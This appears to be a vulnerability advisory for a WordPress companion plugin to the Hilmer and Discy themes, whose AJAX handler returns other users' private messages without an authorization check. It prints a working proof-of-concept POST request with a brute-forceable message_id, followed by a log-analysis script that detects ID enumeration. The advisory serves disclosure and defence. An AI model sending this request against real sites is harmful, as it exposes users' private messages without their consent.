The plugin, which is a companion plugin to the Hilmer and Discy themes, does not check authorization before displaying private messages. Any logged-in user can therefore read other users' private messages by supplying the message ID, which can easily be brute-forced.
POST /wp-admin/admin-ajax.php HTTP/2
Cookie: <any user valid cookie>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 42

action=wpqa_message_reply&message_id=43889

Here you can view my private message using message_id=43889
https://youtu.be/xKKouQ8cUgQ
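One way to spot the message-ID enumeration described above in request logs, added here as an example and not taken from the plugin or the advisory. It assumes an audit log that records the authenticated user and the POST body as JSON lines (the `ts`, `user`, `path` and `body` field names are hypothetical); the sample records, user names and thresholds are constructed.

```python
import json
from collections import defaultdict
from urllib.parse import parse_qs

ACTION = "wpqa_message_reply"  # AJAX action named in the advisory

def _rec(ts, user, body):
    # Constructed audit record; field names are assumptions, not a real log format.
    return json.dumps({"ts": ts, "user": user,
                       "path": "/wp-admin/admin-ajax.php", "body": body})

# Constructed sample: alice re-reads her own thread, bob calls another action,
# mallory walks ten consecutive message IDs in ten seconds.
SAMPLE_LOG = "\n".join(
    [_rec(100, "alice", f"action={ACTION}&message_id=43889"),
     _rec(160, "alice", f"action={ACTION}&message_id=43889"),
     _rec(900, "alice", f"action={ACTION}&message_id=43890"),
     _rec(200, "bob", "action=heartbeat&message_id=1")]
    + [_rec(300 + i, "mallory", f"action={ACTION}&message_id={43880 + i}")
       for i in range(10)])

def message_reads(log_text):
    """Map user -> [(ts, message_id)] for requests to the affected action."""
    hits = defaultdict(list)
    for line in filter(None, map(str.strip, log_text.splitlines())):
        rec = json.loads(line)
        if not rec["path"].endswith("/admin-ajax.php"):
            continue
        form = parse_qs(rec["body"])
        mid = form.get("message_id", [""])[0]
        if form.get("action", [""])[0] == ACTION and mid.isdigit():
            hits[rec["user"]].append((rec["ts"], int(mid)))
    return dict(hits)

def flag_enumeration(log_text, window=60, max_distinct=5):
    """Users who hit more than max_distinct different IDs within window seconds."""
    flagged = {}
    for user, events in message_reads(log_text).items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1
            distinct = len({mid for _, mid in events[start:end + 1]})
            if distinct > max_distinct:
                flagged[user] = max(flagged.get(user, 0), distinct)
    return flagged

if __name__ == "__main__":
    print(flag_enumeration(SAMPLE_LOG))
```

Detection of this kind only shortens exposure. The missing control is the one the advisory names: the handler has to check that the requesting user is authorized to read the requested `message_id` before returning it.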
Bikram kharal
Bikram kharal
Yes
2022-08-01 (about 9 months ago)
2022-08-01 (about 9 months ago)
2023-04-30 (about 22 days ago)